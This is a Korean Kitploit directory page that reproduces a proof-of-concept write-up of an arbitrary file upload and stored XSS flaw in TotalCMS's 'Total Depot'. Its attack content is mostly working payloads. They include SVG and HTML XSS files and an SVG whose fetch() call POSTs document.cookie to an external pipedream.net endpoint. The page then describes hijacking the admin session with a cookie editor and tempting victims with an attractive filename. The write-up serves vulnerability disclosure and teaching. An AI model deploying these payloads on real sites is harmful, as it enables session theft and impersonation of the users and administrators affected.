Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
TotalCMS-Arbitrary_File-Upload--XSS_Steal_Cookies---TotalDepot — TotalCMS는 임의 파일 업로드 - XSS 취약점의 영향을 받으며, 이를 통해 저장형 교차 사이트 스크립팅(XSS) 공격과 세션 쿠키 탈취가 가능합니다. | Kitploit
도구/GitHubGitHub/sromanhu/totalcms-arbitrary_file-upload--xss_steal_cookies---totaldepot
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationLearning & Education
GitHubsromanhu/totalcms-arbitrary_file-upload--xss_steal_cookies---totaldepot

TotalCMS-Arbitrary_File-Upload--XSS_Steal_Cookies---TotalDepot

TotalCMS는 임의 파일 업로드 - XSS 취약점의 영향을 받으며, 이를 통해 저장형 교차 사이트 스크립팅(XSS) 공격과 세션 쿠키 탈취가 가능합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
32년 전아직 검토되지 않음

TotalCMS 임의 파일 업로드 - XSS 및 쿠키 탈취

작성자: (Sergio)

설명: TotalCMS는 교차 사이트 스크립팅(XSS)과 세션 쿠키 탈취를 가능하게 하는 임의 파일 업로드 - XSS 취약점의 영향을 받습니다.

공격 벡터: "Total Depot" 파일 업로드 검증(sanitation)의 취약점으로 인해 숨겨진 alert 교차 사이트 스크립팅(XSS)이 포함된 PDF / SVG / HTML 파일을 업로드하고 사용자 쿠키를 탈취할 수 있습니다.


다음 2가지 PoC를 수행합니다:

- POC 1: PDF / SVG 및 HTML 파일에서의 교차 사이트 스크립팅(XSS)

- POC 2: 사용자 쿠키 탈취 및 외부 서버로 전달하여 이를 가로채고 사용자를 사칭

첫 번째 PoC부터 시작합니다:

POC 1: PDF / SVG 및 HTML 파일에서의 교차 사이트 스크립팅(XSS)

관리자 패널(https://www.totalcms.co/demo/total-cms/admin/)에 로그인하면 관리자 사이트의 "Total Depot"으로 이동하여 숨겨진 XSS가 포함된 PDF / SVG / HTML 파일을 업로드합니다.

다음은 페이로드입니다:

XSS PDF 페이로드:

JS2PDFInjector 도구로 생성된 XSS 페이로드이며, 다음 내용을 포함하는 js 페이로드입니다:

root@kitploit:~
app.alert("XSS");

SVG 페이로드:

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

HTML 페이로드:

root@kitploit:~
<html>
	<script>
		alert(document.cookie);
	</script>
</html>

이미지

이미지

업로드가 완료되면 해당 링크를 클릭하여 파일이 저장된 경로를 확인할 수 있습니다:

이미지

파일 경로:

이미지

이미지

이미지

그리고 다음은 3가지 유형의 파일에 대한 교차 사이트 스크립팅(XSS) 실행 결과와 사용자 쿠키입니다:

이미지

이미지

이미지

두 번째 PoC를 진행합니다:

- POC 2: 사용자 쿠키 탈취 및 외부 서버로 전달하여 이를 가로채고 사용자를 사칭

사이버 범죄자처럼 행동하여 사용자의 세션 쿠키를 탈취하고 서버로 전송해 보겠습니다.

이 경우에는 PoC로 파일 하나를 업로드했지만, 실제 상황에서는 "NBA Tickets"처럼 흥미로운 이름의 파일을 업로드하여 게시할 수 있습니다. 그러면 피해자 사용자가 파일을 실행할 때 자신도 모르는 사이에 저에게 쿠키를 보내게 됩니다.


먼저 외부 서버와 통신이 되는지 테스트를 수행합니다.

다음은 페이로드입니다:

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"        
height="200"        
zoomAndPan="disable"        
xmlns="http://www.w3.org/2000/svg"        
xmlns:xlink="http://www.w3.org/1999/xlink"        
xml:space="preserve">
<!-- Script linked from the outside-->     
<script xlink:href="https://enbjn0l9vbowi.x.pipedream.net/" />     
<script>       
//<![CDATA[         
alert("XSS");       
]]>     
</script>   
</svg>

이미지

이미지

pipedream Request에서 볼 수 있듯이 요청을 정상적으로 수신했습니다.


쿠키를 탈취하여 pipedream Request로 전송하도록 페이로드를 수정하여 사용자를 사칭할 수 있게 합니다.


다음은 페이로드입니다:

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"        
height="200"        
zoomAndPan="disable"        
xmlns="http://www.w3.org/2000/svg"        
xmlns:xlink="http://www.w3.org/1999/xlink"        
xml:space="preserve">
<!-- Script linked from the outside-->     
<script>
  fetch('https://enbjn0l9vbowi.x.pipedream.net/', {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie
  });
</script>   
</svg>

실행합니다:


이미지

이미지

이미지에서 볼 수 있듯이 사용자의 세션 쿠키를 정상적으로 탈취했습니다.


이제 사용자를 사칭해 보겠습니다. 테스트를 위해 다른 브라우저에서 TotalCMS/admin 세션을 열고 "Cookie Editor" 애드온을 실행합니다.

이미지

세션 쿠키를 pipestream에서 얻은 쿠키로 수정하고 저장합니다.

이미지

웹사이트를 다시 로드했고 관리자 사용자를 사칭했습니다.

이미지


추가 정보:

https://www.totalcms.co/

https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html

도구 다운로드